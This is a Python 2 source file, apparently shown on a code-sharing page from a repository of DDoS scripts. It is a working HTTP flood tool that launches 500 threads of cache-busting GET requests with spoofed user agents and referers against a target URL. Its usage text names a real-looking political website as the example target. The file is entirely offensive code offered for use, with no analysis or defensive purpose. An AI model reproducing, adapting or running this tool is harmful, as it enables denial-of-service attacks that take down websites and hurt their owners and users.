Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/DDOS Scripts/L7/Ddosv1.py
4607 views
1
import urllib2
2
import sys
3
import threading
4
import random
5
import re
6
7
#global params
8
url=''
9
host=''
10
headers_useragents=[]
11
headers_referers=[]
12
request_counter=0
13
flag=0
14
safe=0
15
16
def inc_counter():
17
global request_counter
18
request_counter+=1
19
20
def set_flag(val):
21
global flag
22
flag=val
23
24
def set_safe():
25
global safe
26
safe=1
27
28
# generates a user agent array
29
def useragent_list():
30
global headers_useragents
31
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
32
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
33
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
34
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
35
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
36
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
37
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
38
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
39
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
40
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
41
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
42
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
43
return(headers_useragents)
44
45
# generates a referer array
46
def referer_list():
47
global headers_referers
48
headers_referers.append('http://www.google.com/?q=')
49
headers_referers.append('http://www.usatoday.com/search/results?q=')
50
headers_referers.append('http://engadget.search.aol.com/search?q=')
51
headers_referers.append('http://' + host + '/')
52
return(headers_referers)
53
54
#builds random ascii string
55
def buildblock(size):
56
out_str = ''
57
for i in range(0, size):
58
a = random.randint(65, 90)
59
out_str += chr(a)
60
return(out_str)
61
62
def usage():
63
print '==========================================='
64
print 'coloca: python ddosv1.py <www.micheltemer.com.br>'
65
print '#TOXIC_DIMAN'
66
print '============================================'
67
68
print "\a"
69
print \
70
"""
71
DDoS --> TOXIC_DIMAN
72
73
"""
74
print 'GNUROOT_DEBIAM/TERMUX'
75
76
77
78
#http request
79
def httpcall(url):
80
useragent_list()
81
referer_list()
82
code=0
83
if url.count("?")>0:
84
param_joiner="&"
85
else:
86
param_joiner="?"
87
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
88
request.add_header('User-Agent', random.choice(headers_useragents))
89
request.add_header('Cache-Control', 'no-cache')
90
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
91
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
92
request.add_header('Keep-Alive', random.randint(110,120))
93
request.add_header('Connection', 'keep-alive')
94
request.add_header('Host',host)
95
try:
96
urllib2.urlopen(request)
97
except urllib2.HTTPError, e:
98
#print e.code
99
set_flag(1)
100
print 'DDOS TOXIC_DIMAN'
101
code=500
102
except urllib2.URLError, e:
103
#print e.reason
104
sys.exit()
105
else:
106
inc_counter()
107
urllib2.urlopen(request)
108
return(code)
109
110
111
#http caller thread
112
class HTTPThread(threading.Thread):
113
def run(self):
114
try:
115
while flag<2:
116
code=httpcall(url)
117
if (code==500) & (safe==1):
118
set_flag(2)
119
except Exception, ex:
120
pass
121
122
# monitors http threads and counts requests
123
class MonitorThread(threading.Thread):
124
def run(self):
125
previous=request_counter
126
while flag==0:
127
if (previous+100<request_counter) & (previous<>request_counter):
128
print "%d Shots sends Senting" % (request_counter)
129
previous=request_counter
130
if flag==2:
131
print "\n -M60 Hits are secced"
132
133
#execute
134
if len(sys.argv) < 2:
135
usage()
136
sys.exit()
137
else:
138
if sys.argv[1]=="help":
139
usage()
140
sys.exit()
141
else:
142
143
print "DDOS TOXIC_DIMAN"
144
145
if len(sys.argv)== 3:
146
if sys.argv[2]=="safe":
147
set_safe()
148
url = sys.argv[1]
149
if url.count("/")==2:
150
url = url + "/"
151
m = re.search('http\://([^/]*)/?.*', url)
152
host = m.group(1)
153
for i in range(500):
154
t = HTTPThread()
155
t.start()
156
t = MonitorThread()
157
t.start()
158